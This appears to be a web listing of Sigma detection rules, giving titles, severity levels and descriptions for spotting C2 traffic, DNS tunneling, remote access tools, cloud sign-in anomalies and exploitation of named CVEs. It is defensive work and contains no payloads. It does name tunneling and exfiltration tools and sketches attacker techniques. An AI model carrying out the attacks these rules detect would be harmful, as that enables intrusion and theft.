Potential CSharp Streamer RAT Loading .NET Executable ImagehighDetects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
DPRK Threat Actor - C2 Communication DNS IndicatorshighDetects DNS queries for C2 domains used by DPRK Threat actors.
VsCode Code Tunnel Execution File IndicatormediumDetects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
Network Connection Initiated From Users\Public FoldermediumDetects a network connection initiated from a process located in the "C:\Users\Public" folder. Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone. Use this rule to hunt for potential suspicious or uncommon activity in your environement.
File Download Via Curl.EXEmediumDetects file download using curl.exe
Curl.EXE ExecutionlowDetects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
Curl.EXE Execution With Custom UserAgentmediumDetects execution of curl.exe with custom useragent options
Remote Access Tool - Action1 Arbitrary Code Execution and Remote SessionsmediumDetects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed. Hunting Opportunity 1- Weed Out The Noise When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
Tunneling Tool ExecutionmediumDetects the execution of well known tools that can be abused for data exfiltration and tunneling.
Possible DNS TunnelinghighNormally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.
High NULL Records Requests RatemediumExtremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution
High DNS Requests RatemediumHigh DNS requests amount from host per short period of time
High TXT Records Requests RatemediumExtremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution
High DNS Requests Rate - FirewallmediumHigh DNS requests amount from host per short period of time
Possible DNS RebindingmediumDetects DNS-answer with TTL <10.
DNSCat2 Powershell Implementation Detection Via Process CreationhighThe PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
Suspicious Werfault.exe Network Connection OutboundmediumAdversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection.
attack.initial_access 253
Show Rules (253)
Title Level Description
OMIGOD SCX RunAsProvider ExecuteShellCommand - AuditdhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
User Added To Admin Group - MacOSmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Search-ms and WebDAV Suspicious Indicators in URLhighDetects URL pattern used by search(-ms)/WebDAV initial access campaigns.
Django Framework ExceptionsmediumDetects suspicious Django web application framework exceptions that could indicate exploitation attempts
Potential JNDI Injection Exploitation In JVM Based ApplicationhighDetects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.
Potential Local File Read Vulnerability In JVM Based ApplicationhighDetects potential local file read vulnerability in JVM based apps. If the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.
Potential OGNL Injection Exploitation In JVM Based ApplicationhighDetects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
Process Execution Error In JVM Based ApplicationhighDetects process execution related exceptions in JVM based apps, often relates to RCE
Potential XXE Exploitation Attempt In JVM Based ApplicationhighDetects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.
Potential RCE Exploitation Attempt In NodeJShighDetects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.
OpenCanary - FTP Login AttempthighDetects instances where an FTP service on an OpenCanary node has had a login attempt.
OpenCanary - HTTPPROXY Login AttempthighDetects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
OpenCanary - HTTP GET RequesthighDetects instances where an HTTP service on an OpenCanary node has received a GET request.
OpenCanary - HTTP POST Login AttempthighDetects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.
OpenCanary - SSH Login AttempthighDetects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection AttempthighDetects instances where an SSH service on an OpenCanary node has had a connection attempt.
OpenCanary - Telnet Login AttempthighDetects instances where a Telnet service on an OpenCanary node has had a login attempt.
Python SQL ExceptionsmediumGeneric rule for SQL exceptions in Python according to PEP 249
Ruby on Rails Framework ExceptionsmediumDetects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
Spring Framework ExceptionsmediumDetects suspicious Spring framework exceptions that could indicate exploitation attempts
Potential SpEL Injection In Spring FrameworkhighDetects potential SpEL Injection exploitation, which may lead to RCE.
Suspicious SQL Error MessageshighDetects SQL error messages that indicate probing for an injection attack
Potential Server Side Template Injection In VelocityhighDetects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.
Suspicious SQL QuerymediumDetects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
New Network ACL Entry AddedlowDetects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
New Network Route AddedmediumDetects the addition of a new network route to a route table in AWS.
Ingress/Egress Security Group ModificationmediumDetects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
LoadBalancer Security Group ModificationmediumDetects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
RDS Database Security Group ModificationmediumDetects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.
AWS Key Pair Import ActivitymediumDetects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
New AWS Lambda Function URL Configuration CreatedmediumDetects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
AWS Suspicious SAML ActivitymediumIdentifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
Azure Subscription Permission Elevation Via ActivityLogshighDetects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
Guest Users Invited To Tenant By Non Approved InvitersmediumDetects guest users being invited to tenant by non-approved inviters
Azure Domain Federation Settings ModifiedmediumIdentifies when an user or application modified the federation settings on the domain.
User State Changed From Guest To MembermediumDetects the change of user type from "Guest" to "Member" for potential elevation of privilege.
Azure Subscription Permission Elevation Via AuditLogshighDetects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
Activity From Anonymous IP AddresshighIdentifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical TravelhighIdentifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible TravelhighIdentifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser ActivityhighIndicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat IntelligencehighIndicates user activity that is unusual for the user or consistent with known attack patterns.
New CountryhighDetects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In PropertieshighDetects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Successful Authentications From Countries You Do Not Operate Out OfmediumDetect successful authentications from countries you do not operate out of.
Authentications To Important Apps Using Single Factor AuthenticationmediumDetect when authentications to important application(s) only required single-factor authentication
Failed Authentications From Countries You Do Not Operate Out OflowDetect failed authentications from countries you do not operate out of.
Azure AD Only Single Factor Authentication RequiredlowDetect when users are authenticating without MFA being required.
Potential MFA Bypass Using Legacy Client AuthenticationhighDetects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
Application Using Device Code Authentication FlowmediumDevice code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication FlowmediumResource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Account Disabled or Blocked for Sign in AttemptsmediumDetects when an account is disabled or blocked for sign in but tried to log in
Sign-in Failure Due to Conditional Access Requirements Not MethighDefine a baseline threshold for failed sign-ins due to Conditional Access failures
Use of Legacy Authentication ProtocolshighAlert on when legacy authentication has been used on an account
Login to Disabled AccountmediumDetect failed attempts to sign in to disabled accounts.
Multifactor Authentication DeniedmediumUser has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
Azure Unusual Authentication InterruptionmediumDetects when there is a interruption in the authentication process.
Multifactor Authentication InterruptedmediumIdentifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
Users Authenticating To Other Azure AD TenantsmediumDetect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.
User Access Blocked by Azure Conditional AccessmediumDetect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
Cisco Duo Successful MFA Authentication Via Bypass CodemediumDetects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
Outdated Dependency Or Vulnerability Alert DisabledhighDependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.
Github New Secret CreatedlowDetects when a user creates action secret for the organization, environment, codespaces or repository.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Microsoft 365 - Impossible Travel ActivitymediumDetects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.
Logon from a Risky IP AddressmediumDetects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.
Microsoft 365 - User Restricted from Sending EmailmediumDetects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.
Okta FastPass Phishing DetectionhighDetects when Okta FastPass prevents a known phishing site.
Okta New Admin Console BehaviourshighDetects when Okta identifies new activity in the Admin Console.
Default Credentials UsagemediumBefore deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.
Suspicious OpenSSH Daemon ErrormediumDetects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious Named ErrorhighDetects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Suspicious VSFTPD Error MessagesmediumDetects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
Atlassian Confluence CVE-2022-26134highDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
Apache Spark Shell Command Injection - ProcessCreationhighDetects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
OMIGOD SCX RunAsProvider ExecuteScripthighRule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommandhighRule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Remote Access Tool - Team Viewer Session Started On Linux HostlowDetects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
User Added To Admin Group Via DsclmediumDetects attempts to create and add an account to the admin group via "dscl"
User Added To Admin Group Via DseditGroupmediumDetects attempts to create and/or add an account to the admin group, thus granting admin privileges.
Root Account Enable Via DsenablerootmediumDetects attempts to enable the root account via "dsenableroot"
Disk Image Mounting Via Hdiutil - MacOSmediumDetects the execution of the hdiutil utility in order to mount disk images.
Remote Access Tool - Team Viewer Session Started On MacOS HostlowDetects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Suspicious Browser Child Process - MacOSmediumDetects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
Suspicious Execution via macOS Script EditormediumDetects when the macOS Script Editor utility spawns an unusual child process.
User Added To Admin Group Via SysadminctlmediumDetects attempts to create and add an account to the admin group via "sysadminctl"
Guest Account Enabled Via SysadminctllowDetects attempts to enable the guest account using the sysadminctl utility
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
DNS Query to External Service Interaction DomainshighDetects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
OMIGOD HTTP No Authentication RCEhighDetects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Apache Threading ErrormediumDetects an issue in apache logs that reports threading related errors
Download From Suspicious TLD - BlacklistlowDetects download of certain file types from hosts in suspicious TLDs
Download From Suspicious TLD - WhitelistlowDetects executable downloads from suspicious remote systems
F5 BIG-IP iControl Rest API Command Execution - ProxymediumDetects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
Flash Player Update from Suspicious LocationhighDetects a flashplayer update from an unofficial location
Hack Tool User AgenthighDetects suspicious user agent strings user by hack tools in proxy logs
Suspicious External WebDAV ExecutionhighDetects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
Successful IIS Shortname Fuzzing ScanmediumWhen IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~"
Java Payload StringshighDetects possible Java payloads in web access logs
JNDIExploit PatternhighDetects exploitation attempt using the JNDI-Exploit-Kit
Path Traversal Exploitation AttemptsmediumDetects path traversal exploitation attempts
SQL Injection Strings In URIhighDetects potential SQL injection attempts via GET requests in access logs.
Suspicious User-Agents Related To Recon ToolsmediumDetects known suspicious (default) user-agents related to scanning/recon tools
Cross Site Scripting StringshighDetects XSS attempts injected via GET requests in access logs
USB Device PluggedlowDetects plugged/unplugged USB devices
Device Installation BlockedmediumDetects an installation of a device that is forbidden by the system policy
External Disk Drive Or USB Storage Device Was Recognized By The SystemlowDetects external disk drives or plugged-in USB devices.
ISO Image MountedmediumDetects the mount of an ISO image on an endpoint
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Password Protected ZIP File Opened (Email Attachment)highDetects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
External Remote RDP Logon from Public IPmediumDetects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
External Remote SMB Logon from Public IPhighDetects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
Failed Logon From Public IPmediumDetects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
DNS Query Request By QuickAssist.EXElowDetects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
Unusual File Modification by dns.exehighDetects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Unusual File Deletion by Dns.exehighDetects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Suspicious File Drop by ExchangemediumDetects suspicious file type dropped by an Exchange component in IIS
Potential Initial Access via DLL Search Order HijackingmediumDetects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
ISO File Created Within Temp FoldershighDetects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
ISO or Image Mount Indicator in Recent FilesmediumDetects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
Office Macro File CreationlowDetects the creation of a new office macro files on the systems
Office Macro File DownloadmediumDetects the creation of a new office macro files on the systems via an application (browser, mail client).
Office Macro File Creation From Suspicious ProcesshighDetects the creation of a office macro file from a a suspicious process
Suspicious MSExchangeMailboxReplication ASPX WritehighDetects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
Suspicious Computer Machine Password by PowerShellmediumThe Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.
Unusual Child Process of dns.exehighDetects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
HTML Help HH.EXE Suspicious Child ProcesshighDetects a suspicious child process of a Microsoft HTML Help (HH.exe)
Suspicious HH.EXE ExecutionhighDetects a suspicious execution of a Microsoft HTML Help (HH.exe)
Suspicious HWP Sub ProcesseshighDetects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Suspicious Shells Spawn by Java Utility KeytoolhighDetects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Suspicious Processes Spawned by Java.EXEhighDetects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXEmediumDetects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Suspicious Child Process Of SQL ServerhighDetects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam DabatasecriticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
Suspicious Microsoft OneNote Child ProcesshighDetects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
Suspicious Execution From Outlook Temporary FolderhighDetects a suspicious program execution in Outlook temp folder
Remote Access Tool - AnyDesk Execution With Known Revoked Signing CertificatemediumDetects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of Anydesk using the compromised certificate This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
Remote Access Tool - ScreenConnect Installation ExecutionmediumDetects ScreenConnect program starts that establish a remote access to a system.
Remote Access Tool - ScreenConnect Server Web Shell ExecutionhighDetects potential web shell execution from the ScreenConnect server process.
Remote Access Tool - Team Viewer Session Started On Windows HostlowDetects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Arbitrary Shell Command Execution Via Settingcontent-MsmediumThe .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Phishing Pattern ISO in ArchivehighDetects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
Suspicious Double Extension File ExecutioncriticalDetects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
Terminal Service Process SpawnhighDetects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Suspicious Processes Spawned by WinRMhighDetects suspicious processes including shells spawnd from WinRM host process
Windows Registry Trust Record ModificationmediumAlerts on trust record modification within the registry, indicating usage of macros
Rejetto HTTP File Server RCEhighDetects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
CVE-2010-5278 Exploitation AttemptcriticalMODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
Exploit for CVE-2017-0261mediumDetects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Droppers Exploiting CVE-2017-11882criticalDetects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Exploit for CVE-2017-8759criticalDetects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
Fortinet CVE-2018-13379 ExploitationcriticalDetects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
Oracle WebLogic ExploitcriticalDetects access to a webshell dropped into a keystore folder on the WebLogic server
Pulse Secure Attack CVE-2019-11510criticalDetects CVE-2019-11510 exploitation attempt - URI contains Guacamole
Citrix Netscaler Attack CVE-2019-19781criticalDetects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
Confluence Exploitation CVE-2019-3398criticalDetects the exploitation of the Confluence vulnerability described in CVE-2019-3398
Ursnif Malware C2 URL PatterncriticalDetects Ursnif C2 traffic.
CVE-2020-0688 Exploitation AttempthighDetects CVE-2020-0688 Exploitation attempts
CVE-2020-0688 Exchange Exploitation via Web LogcriticalDetects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
CVE-2020-0688 Exploitation via EventloghighDetects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
CVE-2020-10148 SolarWinds Orion API Auth BypasscriticalDetects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
DNS RCE CVE-2020-1350criticalDetects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
CVE-2020-5902 F5 BIG-IP Exploitation AttemptcriticalDetects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195criticalDetects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
Exploited CVE-2020-10189 Zoho ManageEnginehighDetects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
TerraMaster TOS CVE-2020-28188highDetects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
Cisco ASA FTD Exploit CVE-2020-3452highDetects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)
Oracle WebLogic Exploit CVE-2020-14882highDetects exploitation attempts on WebLogic servers
Arcadyan Router ExploitationscriticalDetects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
Oracle WebLogic Exploit CVE-2021-2109criticalDetects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
CVE-2021-21972 VSphere ExploitationhighDetects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
CVE-2021-21978 Exploitation AttempthighDetects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
VMware vCenter Server File Upload CVE-2021-22005highDetects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
Fortinet CVE-2021-22123 ExploitationcriticalDetects CVE-2021-22123 exploitation attempt against Fortinet WAFs
Pulse Connect Secure RCE Attack CVE-2021-22893highThis rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
Potential Atlassian Confluence CVE-2021-26084 Exploitation AttempthighDetects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
Potential CVE-2021-26084 Exploitation AttempthighDetects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection
Exploitation of CVE-2021-26814 in WazuhhighDetects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
ProxyLogon Reset Virtual Directories Based On IIS LogcriticalWhen exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
Potential CVE-2021-27905 Exploitation AttemptmediumDetects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
Exchange Exploitation CVE-2021-28480criticalDetects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
CVE-2021-33766 Exchange ProxyToken ExploitationcriticalDetects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
ADSelfService ExploitationhighDetects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus ExploitcriticalDetects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
LPE InstallerFileTakeOver PoC CVE-2021-41379highDetects PoC tool used to exploit LPE vulnerability CVE-2021-41379
CVE-2021-41773 Exploitation AttempthighDetects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
Sitecore Pre-Auth RCE CVE-2021-42237highDetects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
Grafana Path Traversal Exploitation CVE-2021-43798criticalDetects a successful Grafana path traversal exploitation
Potential CVE-2021-44228 Exploitation Attempt - VMware HorizonhighDetects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
Log4j RCE CVE-2021-44228 GenerichighDetects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
Log4j RCE CVE-2021-44228 in FieldshighDetects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
Exchange ProxyShell PatternhighDetects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
Successful Exchange ProxyShell AttackcriticalDetects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
SonicWall SSL/VPN Jarrewrite ExploitationhighDetects exploitation attempts of the SonicWall Jarrewrite Exploit
Exchange Exploitation Used by HAFNIUMhighDetects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
Potential CVE-2022-21587 Exploitation AttempthighDetects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code ExecutionmediumDetects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
Potential CVE-2022-26809 Exploitation AttempthighDetects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
Zimbra Collaboration Suite Email Server Unauthenticated RCEmediumDetects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
CVE-2022-31659 VMware Workspace ONE Access RCEmediumDetects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
